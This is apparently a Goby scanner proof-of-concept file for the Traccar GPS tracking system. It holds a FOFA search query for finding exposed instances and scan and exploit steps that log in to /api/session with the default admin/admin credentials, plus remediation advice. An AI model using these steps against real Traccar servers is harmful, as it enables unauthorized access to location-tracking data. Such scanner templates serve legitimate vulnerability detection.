qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Traccar-Default-password.json

148 lines
5.2 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Traccar Default password",
"Description": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p><br></p><p>Username admin password admin</p>",
"Product": "Traccar",
"Homepage": "https://www.traccar.org/",
"DisclosureDate": "2022-03-30",
"Author": "xiaodan",
"FofaQuery": "title=\"Traccar\"",
"GobyQuery": "title=\"Traccar\"",
"Level": "1",
"Impact": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p>Username admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/session",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "email=admin&password=admin&undefined=false"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name\":\"admin\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api/session",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "email=admin&password=admin&undefined=false"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name\":\"admin\"",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|admin:admin"
]
}
],
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2021-40750"
],
"CVSSScore": "5",
"Translation": {
"CN": {
"Name": "Traccar 默认密码",
"Product": "Traccar",
"Description": "<p><code></code><span style=\"font-size: 16px;\"></span>Traccar是一个开源的GPS跟踪系统。 Traccar存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。<span style=\"font-size: 16px;\"></span><span style=\"font-size: 16px;\"></span><br></p><p>用户名admin密码admin</p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p>Traccar是一个开源的GPS跟踪系统。 Traccar存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。<br></p><p>用户名admin密码admin</p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "Traccar Default password",
"Product": "Traccar",
"Description": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p><br></p><p>Username admin password admin</p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Traccar is an open source GPS tracking system. Traccar has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p><p>Username admin password admin</p>",
"VulType": [
"default password"
],
"Tags": [
"default password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink